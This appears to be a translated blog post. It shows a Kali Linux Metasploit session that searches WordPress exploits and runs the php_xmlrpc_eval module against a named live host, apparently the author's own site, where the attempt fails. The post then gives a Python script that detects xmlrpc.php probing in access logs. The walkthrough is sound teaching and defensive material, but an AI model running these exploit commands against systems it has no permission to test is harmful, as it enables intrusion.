※Carrying out what is described in this article against a system you do not manage, without permission, is illegal, so never do it※
This follows on from "Trying out Kali Linux on Docker for Windows"; the steps below are run in that container.
As attacks go it is nothing much: I only tried the xmlrpc exploit.
Preparation

```
PS C:\Users\shimizu> docker exec -it (container ID) /bin/bash
root@81c581d5cf43:/# apt-get update && apt-get -y upgrade && apt-get install -y kali-linux-web
...(restart the container after this has been applied)
root@81c581d5cf43:/# /etc/init.d/postgresql start
Starting PostgreSQL 12 database server: main.
root@81c581d5cf43:/# update-rc.d postgresql enable
root@81c581d5cf43:/# msfdb init
...
```
Running Metasploit

```
root@81c581d5cf43:/# msfconsole
(Metasploit ASCII-art banner)

       =[ metasploit v5.0.66-dev                          ]
+ -- --=[ 1956 exploits - 1092 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
```
Search for WordPress exploits

```
msf5 > search rank:excellent wordpress

Matching Modules
================

   #   Name                                                           Disclosure Date  Rank       Check  Description
   -   ----                                                           ---------------  ----       -----  -----------
   0   exploit/freebsd/local/rtld_execl_priv_esc                      2009-11-30       excellent  Yes    FreeBSD rtld execl() Privilege Escalation
   1   exploit/multi/http/wp_crop_rce                                 2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload
   2   exploit/multi/http/wp_db_backup_rce                            2019-04-24       excellent  Yes    WP Database Backup RCE
   3   exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload  2016-05-04       excellent  Yes    WordPress Ninja Forms Unauthenticated File Upload
   4   exploit/multi/http/wp_responsive_thumbnail_slider_upload       2015-08-28       excellent  Yes    WordPress Responsive Thumbnail Slider Arbitrary File Upload
   5   exploit/unix/webapp/joomla_akeeba_unserialize                  2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution
   6   exploit/unix/webapp/jquery_file_upload                         2018-10-09       excellent  Yes    blueimp's jQuery (Arbitrary) File Upload
   7   exploit/unix/webapp/php_xmlrpc_eval                            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
   8   exploit/unix/webapp/wp_admin_shell_upload                      2015-02-21       excellent  Yes    WordPress Admin Shell Upload
   9   exploit/unix/webapp/wp_advanced_custom_fields_exec             2012-11-14       excellent  Yes    WordPress Plugin Advanced Custom Fields Remote File Inclusion
   10  exploit/unix/webapp/wp_ajax_load_more_file_upload              2015-10-10       excellent  Yes    WordPress Ajax Load More PHP Upload Vulnerability
   11  exploit/unix/webapp/wp_asset_manager_upload_exec               2012-05-26       excellent  Yes    WordPress Asset-Manager PHP File Upload Vulnerability
   12  exploit/unix/webapp/wp_creativecontactform_file_upload         2014-10-22       excellent  Yes    WordPress Creative Contact Form Upload Vulnerability
   13  exploit/unix/webapp/wp_downloadmanager_upload                  2014-12-03       excellent  Yes    WordPress Download Manager (download-manager) Unauthenticated File Upload
   14  exploit/unix/webapp/wp_easycart_unrestricted_file_upload       2015-01-08       excellent  No     WordPress WP EasyCart Unrestricted File Upload
   15  exploit/unix/webapp/wp_foxypress_upload                        2012-06-05       excellent  Yes    WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution
   16  exploit/unix/webapp/wp_frontend_editor_file_upload             2012-07-04       excellent  Yes    WordPress Front-end Editor File Upload
   17  exploit/unix/webapp/wp_holding_pattern_file_upload             2015-02-11       excellent  Yes    WordPress Holding Pattern Theme Arbitrary File Upload
   18  exploit/unix/webapp/wp_inboundio_marketing_file_upload         2015-03-24       excellent  Yes    WordPress InBoundio Marketing PHP Upload Vulnerability
   19  exploit/unix/webapp/wp_infusionsoft_upload                     2014-09-25       excellent  Yes    WordPress InfusionSoft Upload Vulnerability
   20  exploit/unix/webapp/wp_lastpost_exec                           2005-08-09       excellent  No     WordPress cache_lastpostdate Arbitrary Code Execution
   21  exploit/unix/webapp/wp_mobile_detector_upload_execute          2016-05-31       excellent  Yes    WordPress WP Mobile Detector 3.5 Shell Upload
   22  exploit/unix/webapp/wp_nmediawebsite_file_upload               2015-04-12       excellent  Yes    WordPress N-Media Website Contact Form Upload Vulnerability
   23  exploit/unix/webapp/wp_optimizepress_upload                    2013-11-29       excellent  Yes    WordPress OptimizePress Theme File Upload Vulnerability
   24  exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload  2014-11-11       excellent  Yes    WordPress Photo Gallery Unrestricted File Upload
   25  exploit/unix/webapp/wp_pixabay_images_upload                   2015-01-19       excellent  Yes    WordPress Pixabay Images PHP Code Upload
   26  exploit/unix/webapp/wp_plainview_activity_monitor_rce          2018-08-26       excellent  Yes    WordPress Plainview Activity Monitor RCE
   27  exploit/unix/webapp/wp_platform_exec                           2015-01-21       excellent  No     WordPress Platform Theme File Upload Vulnerability
   28  exploit/unix/webapp/wp_property_upload_exec                    2012-03-26       excellent  Yes    WordPress WP-Property PHP File Upload Vulnerability
   29  exploit/unix/webapp/wp_reflexgallery_file_upload               2012-12-30       excellent  Yes    WordPress Reflex Gallery Upload Vulnerability
   30  exploit/unix/webapp/wp_revslider_upload_execute                2014-11-26       excellent  Yes    WordPress RevSlider File Upload and Execute Vulnerability
   31  exploit/unix/webapp/wp_slideshowgallery_upload                 2014-08-28       excellent  Yes    WordPress SlideShow Gallery Authenticated File Upload
   32  exploit/unix/webapp/wp_symposium_shell_upload                  2014-12-11       excellent  Yes    WordPress WP Symposium 14.11 Shell Upload
   33  exploit/unix/webapp/wp_total_cache_exec                        2013-04-17       excellent  Yes    WordPress W3 Total Cache PHP Code Execution
   34  exploit/unix/webapp/wp_worktheflow_upload                      2015-03-14       excellent  Yes    WordPress Work The Flow Upload Vulnerability
   35  exploit/unix/webapp/wp_wpshop_ecommerce_file_upload            2015-03-09       excellent  Yes    WordPress WPshop eCommerce Arbitrary File Upload Vulnerability
   36  exploit/unix/webapp/wp_wptouch_file_upload                     2014-07-14       excellent  Yes    WordPress WPTouch Authenticated File Upload
   37  exploit/unix/webapp/wp_wysija_newsletters_upload               2014-07-01       excellent  Yes    WordPress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload
   38  exploit/windows/fileformat/ms12_005                            2012-01-10       excellent  No     MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability
   39  exploit/windows/fileformat/winrar_name_spoofing                2009-09-28       excellent  No     WinRAR Filename Spoofing
```
Select php_xmlrpc_eval and display its information

```
msf5 > use exploit/unix/webapp/php_xmlrpc_eval
msf5 exploit(unix/webapp/php_xmlrpc_eval) > info

       Name: PHP XML-RPC Arbitrary Code Execution
     Module: exploit/unix/webapp/php_xmlrpc_eval
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2005-06-29

Provided by:
  hdm <x@hdm.io>
  cazz <bmc@shmoo.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PATH     /xmlrpc.php      yes       Path to xmlrpc.php
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 512

Description:
  This module exploits an arbitrary code execution flaw discovered in
  many implementations of the PHP XML-RPC module. This flaw is
  exploitable through a number of PHP web applications, including but
  not limited to Drupal, WordPress, Postnuke, and TikiWiki.

References:
  https://cvedetails.com/cve/CVE-2005-1921/
  OSVDB (17793)
  http://www.securityfocus.com/bid/14088
```
Set the options and run

Since this WordPress instance does not have the vulnerability, the exploit fails.

```
msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RHOSTS tech.akat.info
RHOSTS => tech.akat.info
msf5 exploit(unix/webapp/php_xmlrpc_eval) > set RPORT 443
RPORT => 443
msf5 exploit(unix/webapp/php_xmlrpc_eval) > set SSL true
SSL => true
msf5 exploit(unix/webapp/php_xmlrpc_eval) > show options

Module options (exploit/unix/webapp/php_xmlrpc_eval):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /xmlrpc.php      yes       Path to xmlrpc.php
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   tech.akat.info   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(unix/webapp/php_xmlrpc_eval) > exploit
...
[-] exploit failed: no response
[*] Exploit completed, but no session was created.
```
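Seen from the server side, the attempt above is a handful of POST requests to /xmlrpc.php, and those land in the web server's access log whether or not the exploit succeeds. The script below is an added example for this post, not code from the article or from Metasploit: it parses combined-format access log lines (Apache or nginx defaults), keeps the requests whose path is /xmlrpc.php, and flags any client that hits that endpoint at least `threshold` times inside a sliding time window. The log lines are constructed for the example (client addresses come from the RFC 5737 documentation range 203.0.113.0/24), and the default of 5 hits per minute is an assumed starting point to tune against your own traffic, not a recommended value.

```python
"""Spot xmlrpc.php probing in Apache/nginx combined-format access logs.

Added example for this post, not code from the article or from Metasploit.
The sample log below is constructed; client addresses come from the
RFC 5737 documentation range 203.0.113.0/24.
"""
import re
import sys
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one client hammers /xmlrpc.php, one touches it once,
# one never does, and one line is deliberately not a valid log entry.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Jan/2020:12:00:01 +0900] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Jan/2020:12:00:05 +0900] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Jan/2020:12:00:07 +0900] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Jan/2020:12:00:08 +0900] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Jan/2020:12:00:09 +0900] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Jan/2020:12:00:12 +0900] "POST /xmlrpc.php?rsd HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Jan/2020:12:00:15 +0900] "POST /xmlrpc.php HTTP/1.1" 405 0 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Jan/2020:12:00:20 +0900] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.30 - - [10/Jan/2020:12:01:00 +0900] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
this line is not a valid log entry and is skipped by the parser
203.0.113.20 - - [10/Jan/2020:12:05:00 +0900] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string (/xmlrpc.php?rsd)
    return rec


def xmlrpc_requests(lines):
    """Keep only parsed records whose path is exactly /xmlrpc.php."""
    return [r for r in map(parse_line, lines) if r and r["path"] == "/xmlrpc.php"]


def flag_sources(records, threshold=5, window=timedelta(minutes=1)):
    """Map client IP -> largest number of hits seen inside any `window`, for
    clients whose largest count reaches `threshold`."""
    by_ip = defaultdict(list)
    for r in records:
        by_ip[r["ip"]].append(r["time"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        best = start = 0
        for end, t in enumerate(times):          # two-pointer sliding window
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def summarize(lines, threshold=5, window=timedelta(minutes=1)):
    """Total and per-client counts of /xmlrpc.php hits plus the flagged clients."""
    recs = xmlrpc_requests(lines)
    per_ip = defaultdict(int)
    for r in recs:
        per_ip[r["ip"]] += 1
    return {"total": len(recs), "per_ip": dict(per_ip),
            "flagged": flag_sources(recs, threshold, window)}


if __name__ == "__main__":
    if len(sys.argv) > 1:   # real log file given on the command line
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    else:                   # fall back to the constructed sample
        lines = SAMPLE_LOG.splitlines()
    report = summarize(lines)
    print(f"{report['total']} request(s) to /xmlrpc.php from {len(report['per_ip'])} client(s)")
    for ip, count in report["flagged"].items():
        print(f"FLAG {ip}: {count} hits inside one window")
```

Run it with no arguments to see the sample flag 203.0.113.20 (six hits in fifteen seconds) while 203.0.113.30 stays below the threshold, or point it at a real log with `python3 xmlrpc_probe_check.py /var/log/apache2/access.log`. Matching on the path after stripping the query string matters: WordPress itself is polled at `/xmlrpc.php?rsd` by legitimate clients, so a rule that only looks at the exact string `/xmlrpc.php` misses part of the traffic. The sliding window is per client, which is what the exploit attempt above looks like; a distributed probe spreads across many clients and would need a per-path threshold as well.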